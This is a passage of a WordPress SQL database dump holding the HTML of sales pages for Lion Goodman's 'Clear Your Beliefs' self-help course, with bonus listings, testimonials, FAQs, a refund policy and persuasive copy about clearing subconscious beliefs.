"<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\nYou''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<div class="icon_box">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions with Lion Goodman</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies – from the comfort of your own home. Each class session helps you learn the specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes and two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus... the <em>Clear Your Beliefs BONUS Collection</em></h1>\r\n<ul>\r\n	<li><em>What Makes Love So Confusing?</em> – Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>The Spiritual Technology of Manifesting with Beliefs</em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <em>The LoveStyle Profile Quiz</em></li>\r\n	<li><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'copy of cyb', '', 'inherit', 'closed', 'open', '', '936-revision-v1', '', '', '2014-06-17 16:37:42', '2014-06-17 21:37:42', '', 936, 'http://clearyourbeliefs.com/936-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(941, 4194, '2014-06-17 16:39:04', '2014-06-17 21:39:04', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" were created by your beliefs.\r\nWhen you learn to change your beliefs at will, your possibilities are unlimited!</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<p>&nbsp;</p>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances 